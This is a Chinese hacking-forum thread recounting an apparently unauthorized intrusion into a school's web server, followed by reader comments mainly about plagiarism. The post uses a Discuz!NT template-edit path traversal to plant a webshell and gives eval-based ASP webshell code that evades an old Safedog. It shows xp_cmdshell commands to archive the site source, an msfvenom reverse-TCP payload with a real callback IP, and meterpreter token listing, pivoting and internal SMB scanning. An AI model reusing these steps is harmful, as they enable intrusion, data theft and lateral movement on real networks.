用户
搜索
  • TA的每日心情
    奋斗
    前天 16:31
  • 签到天数: 91 天

    连续签到: 5 天

    [LV.6]常住居民II

    i春秋-见习白帽

    宝宝

    Rank: 3Rank: 3

    10

    主题

    39

    帖子

    38

    魔法币
    收听
    1
    粉丝
    1
    注册时间
    2016-5-2
    QQ
    发表于 2018-1-29 20:48:30 217261
    天心血来潮想拿学校主站的源码看看.今天阳光明媚,帮我以前学校再做次安全测试。
    曾经测试过,主站是动易CMS2006,网上没有公开的漏洞。
    图片1.png

    中间件是IIS7.5,配置不当存在一个目录浏览漏洞,也没什么卵用。 图片2.png

    通过网站主页下方的信息得知网站是别人制作的:
    图片3.png

    然后我对XXXX网络公司进行了安全测试,得到分站:www.****.com.cn:82的超级管理员密码**wl****1917 图片4.png

    论坛程序是 Discuz!NT 3.1.0 ,后台可以Getshell访问 http://www.****.com.cn:82/admin/global/global_templatesedit.aspx?path=..%2ftools%2f&filename=rss.aspx&templateid=1&templatename=Default
    即可编辑对应的rss.aspx文件,改成Webshell安全检测脚本。
    图片5.png

    然后访问,发现被安全狗拦截了。。。
    图片6.png
    这安全狗还是我几年前搞的时候的样子看起来是个老版本的安全狗,管理员没更新过..随便改改一句话木马:

    1. <%
    2. dim luan
    3. luan=request("suyan")
    4. response.write("Hello " & suyan)
    5. eval luan
    6. %>


    然后就成功过狗了……..
    用菜刀2010连接,发现提示403
    图片7.png
    根据菜刀显示的HTTP头内容可知,是被狗咬了安全狗拦截了。
    换用菜刀2016版本(下载地址:自行百度/),即可正常连接:
    图片8.png


    然后尝试下执行命令:
    图片9.png

    结果提示:[Err] ActiveX 部件不能创建对象这种情况就是组件被禁用了,只能走下别的麻烦路了。Discuz!NT 3.1.0后台能直接执行SQL语句,如果用之前的方法拿不到shell可以试试执行SQL语句来Getshell我也就懒得找数据库密码去连接了,直接到后台执行SQL语句的地方去。通过命令打包主站的源码:
    1. exec xp_cmdshell 'C:\progra~2\WinRAR\Rar.exe a -k -r -s -m1 D:/****web/yzblog/tools/suyan.rar D:/****web/PowerEasy2006/'; 图片10.png

    之前执行命令确定了是system权限,如果执行xp_cmdshell失败,,百度恢复xp_cmdshell”另外科普下Linux下打包网站:
    1. tar -czf website.tar.gz /home/wwwroot 图片11.png

    然后可以看到打包后的源码有500M,太大了,我没下
    [Bash shell] 纯文本查看 复制代码
    1.> msfvenom -p windows/meterpreter/reverse_tcp LPORT=6666 LHOST=103.27.187.212 -e x86/shikata_ga_nai -i 11 -f py -o C:/suyan/suyan.py
    2. 
    3.DL is deprecated, please use Fiddle
    4.No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    5.No Arch selected, selecting Arch: x86 from the payload
    6.Found 1 compatible encoders
    7.Attempting to encode payload with 11 iterations of x86/shikata_ga_nai
    8.x86/shikata_ga_nai succeeded with size 360 (iteration=0)
    9.x86/shikata_ga_nai succeeded with size 387 (iteration=1)
    10.x86/shikata_ga_nai succeeded with size 414 (iteration=2)
    11.x86/shikata_ga_nai succeeded with size 441 (iteration=3)
    12.x86/shikata_ga_nai succeeded with size 468 (iteration=4)
    13.x86/shikata_ga_nai succeeded with size 495 (iteration=5)
    14.x86/shikata_ga_nai succeeded with size 522 (iteration=6)
    15.x86/shikata_ga_nai succeeded with size 549 (iteration=7)
    16.x86/shikata_ga_nai succeeded with size 576 (iteration=8)
    17.x86/shikata_ga_nai succeeded with size 603 (iteration=9)
    18.x86/shikata_ga_nai succeeded with size 630 (iteration=10)
    19.x86/shikata_ga_nai chosen with final size 630
    20.Payload size: 630 bytes
    21.Saved as: C:/suyan/suyan.py
    22. 
    23.C:\PentestBox\bin\metasploit-framework
    24.>
    载,仅做安全测试嘛,打包完就删除了。
    然后就好奇学校内网里有没有可以直接SMB溢出的服务器呢,我继续上传了免杀的Meterpreter下载地址:自行百度 多占点篇幅,贴一下:

    注意按照我那篇文章做下修改,怎么修改我就不贴了,太占地方了,修改后用Pyinstall打包:
    [Bash shell] 纯文本查看 复制代码
    1.C:\cnzxsoft\pyinstaller-2.0>python PyInstaller.py
    2.--console --onefile luan.py
    3.548 INFO: wrote C:\cnzxsoft\pyinstaller-2.0\luan\luan.spec
    4.641 INFO: Testing for ability to set icons, version resources...
    5.743 INFO: ... resource update available
    6.746 INFO: UPX is not available.
    7.2071 INFO: checking Analysis
    8.2072 INFO: building Analysis because out00-Analysis.toc non existent
    9.2072 INFO: running Analysis out00-Analysis.toc
    10.2072 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
    11. 
    12.15654 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.2
    13.1022.8_none ...
    14.15655 INFO: Found manifest C:\Windows\WinSxS\Manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
    15.15668 INFO: Searching for file msvcr90.dll
    16.15670 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcr90.dll
    17.15673 INFO: Searching for file msvcp90.dll
    18.15674 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcp90.dll
    19.15675 INFO: Searching for file msvcm90.dll
    20.15677 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcm90.dll
    21.15960 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\support\_pyi_bootstrap.py
    22.16641 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\archive.py
    23.16733 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\carchive.py
    24.16822 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\iu.py
    25.16861 INFO: Analyzing luan.py
    26.16931 INFO: Hidden import 'encodings' has been found otherwise
    27.16933 INFO: Looking for run-time hooks
    28.16934 INFO: Analyzing rthook C:\cnzxsoft\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py
    29.17144 INFO: Warnings written to C:\cnzxsoft\pyinstaller-2.0\luan\build\pyi.win32\luan\warnluan.txt
    30.17150 INFO: checking PYZ
    31.17151 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
    32.17152 INFO: building PYZ out00-PYZ.toc
    33.19378 INFO: checking PKG
    34.19379 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
    35.19381 INFO: building PKG out00-PKG.pkg
    36.20487 INFO: checking EXE
    37.20492 INFO: rebuilding out00-EXE.toc because luan.exe missing
    38.20493 INFO: building EXE from out00-EXE.toc
    39.20510 INFO: Appending archive to EXE C:\cnzxsoft\pyinstaller-2.0\suyan\dist\suyan.exe
    40. 
    41.C:\cnzxsoft\pyinstaller-2.0>




    用菜刀上传,用
    SQL语句执行:
    图片12.png

    MSF扫一下

    [Bash shell] 纯文本查看 复制代码
    1.meterpreter > run post/windows/manage/migrate
    2. 
    3. Running module against WIN-TOYQDX47WMW
    4. Current server process: suyan.exe (5996)
    5. Spawning notepad.exe process to migrate to
    6.[+] Migrating to 4316
    7.[+] Successfully migrated to process 4316
    8. 
    9.meterpreter > sysinfo
    10.Computer        : WIN-TOYQDX47WMW
    11.OS              : Windows 2008 (Build 6002, Service Pack 2).
    12.Architecture    : x64
    13.System Language : zh_CN
    14.Domain          : WORKGROUP
    15.Logged On Users : 0
    16.Meterpreter     : x86/windows
    17. 
    18.meterpreter >use incognito
    19.Loading extension incognito...success.
    20. 
    21.meterpreter > list_tokens -u
    22. 
    23.Delegation Tokens Available
    24.========================================
    25.IIS APPPOOL\jwweb
    26.NT AUTHORITY\IUSR
    27.NT AUTHORITY\LOCAL SERVICE
    28.NT AUTHORITY\NETWORK SERVICE
    29.NT AUTHORITY\SYSTEM
    30. 
    31.Impersonation Tokens Available
    32.========================================
    33.NT AUTHORITY\ANONYMOUS LOGON
    34. 
    35.meterpreter > run get_local_subnets
    36. 
    37.[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
    38.[!] Example: run post/windows/manage/autoroute OPTION=value [...]
    39.Local subnet: 172.16.11.0/255.255.255.0
    40.meterpreter > run post/windows/manage/autoroute
    41. 
    42. Running module against WIN-TOYQDX47WMW
    43. Searching for subnets to autoroute.
    44.[+] Route added to subnet 172.16.11.0/255.255.255.0 from host's routing table.
    45.[+] Route added to subnet 169.254.0.0/255.255.0.0 from Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #4.
    46.meterpreter > background
    47. Backgrounding session 2...
    48.msf exploit(handler) > route print
    49. 
    50.IPv4 Active Routing Table
    51.=========================
    52. 
    53.Subnet             Netmask            Gateway
    54.------             -------            -------
    55.169.254.0.0        255.255.0.0        Session 2
    56.172.16.11.0        255.255.255.0      Session 2
    57. 
    58. There are currently no IPv6 routes defined.
    59.msf exploit(handler) >  use auxiliary/scanner/smb/
    60.use auxiliary/scanner/smb/pipe_auditor           use auxiliary/scanner/smb/smb_enumshares         use auxiliary/scanner/smb/smb_ms17_010
    61.use auxiliary/scanner/smb/pipe_dcerpc_auditor    use auxiliary/scanner/smb/smb_enumusers          use auxiliary/scanner/smb/smb_uninit_cred
    62.use auxiliary/scanner/smb/p**ec_loggedin_users  use auxiliary/scanner/smb/smb_enumusers_domain   use auxiliary/scanner/smb/smb_version
    63.use auxiliary/scanner/smb/smb2                   use auxiliary/scanner/smb/smb_login
    64.use auxiliary/scanner/smb/smb_enum_gpp           use auxiliary/scanner/smb/smb_lookupsid
    65.msf exploit(handler) >use auxiliary/scanner/smb/smb_version
    66.msf auxiliary(smb_version) > set rhosts 172.16.11.1-255
    67.rhosts => 172.16.11.1-255
    68.msf auxiliary(smb_version) > sthreads 10
    69.threads => 10
    70.msf auxiliary(smb_version) > run
    71. 
    72. 172.16.11.11:445      - Host is running Windows 2008 Standard SP2 (build:6002) (name:WIN-TOYQDX47WMW) (workgroup:WORKGROUP )
    73. 172.16.11.12:445      - Host is running Windows 2012 R2 Standard (build:9600) (name:WIN-HKFJ6JJA9L5)
    74. Scanned  29 of 255 hosts (11% complete)
    75. Scanned  52 of 255 hosts (20% complete)
    76. Scanned  77 of 255 hosts (30% complete)
    77. Scanned 102 of 255 hosts (40% complete)
    78. Scanned 131 of 255 hosts (51% complete)
    79. Scanned 153 of 255 hosts (60% complete)
    80. Scanned 179 of 255 hosts (70% complete)
    81. Scanned 204 of 255 hosts (80% complete)
    82.^C Caught interrupt from the console...
    83.[/size][/font][font=宋体][size=3] Auxiliary module execution completed
    84.msf auxiliary(smb_version) >

    好像就两台机器。。另一台还是
    win2012R2smb溢出那个目前测试只能用在xp,7,2008。我的目标之前已经达到了,就先到此为止吧







    白帽子社区一群:298818545
    白帽子社区二群:474414029

    官方微信公众号:白帽子社区
    发表于 2018-1-30 12:02:13
    http://lu4n.com/a-simple-pentest-2017-04-19/,如果这不是你的博客,那么你就是侵犯了别人的版权了,望给出个回复
    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!投稿请加我QQ:286894635。
    i春秋-楚:533191896
    i春秋-燕:129821314
    i春秋-齐:417360103
    i春秋-秦:262108018
    使用道具 举报 回复
    发表于 2018-1-30 18:37:19
    yyyxy 发表于 2018-1-30 12:02
    http://lu4n.com/a-simple-pentest-2017-04-19/,如果这不是你的博客,那么你就是侵犯了别人的版权了,望给 ...

    这是我们公众号上的文章,是内部人员提交的,具体的文章可以在我们公众号上看到
    白帽子社区一群:298818545
    白帽子社区二群:474414029

    官方微信公众号:白帽子社区
    使用道具 举报 回复
    发表于 2018-1-30 18:39:44
    hack_xiaofeng 发表于 2018-1-30 18:37
    这是我们公众号上的文章,是内部人员提交的,具体的文章可以在我们公众号上看到 ...

    如果的确存在问题的话,我这边可以删帖
    白帽子社区一群:298818545
    白帽子社区二群:474414029

    官方微信公众号:白帽子社区
    使用道具 举报 回复
    http://lu4n.com/a-simple-pentest-2017-04-19/   原文  

    盗帖狗?加上原创你好意思?
    使用道具 举报 回复
    使用道具 举报 回复
    发表于 2018-1-30 16:25:15
    不尊重别人的知识产权么?如果你的原创帖子被盗用了,而且还没个出处,你会怎么想……
    求知若饥,虚心若愚。
    使用道具 举报 回复
    666.厉害了我的哥
    使用道具 举报 回复
    发表于 2018-1-30 10:14:56
    厉害,学习了
    小白~~~
    使用道具 举报 回复
    你一开始怎么知道超级管理员的密码
    使用道具 举报 回复
    发表于 2018-1-30 10:42:14
    6666666666
    使用道具 举报 回复
    学习了。
    使用道具 举报 回复
    使用道具 举报 回复
    发表于 2018-1-30 12:06:25
    熊孩子,学习的网站都被你日烂了
    CE安全网 www.cesafe.com
    使用道具 举报 回复
    好厉害!!!
    使用道具 举报 回复
    我不明白……为什么菜刀10版403,怎么16版就ok了?16版长的好看?
    使用道具 举报 回复
    666.厉害了我的姐
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册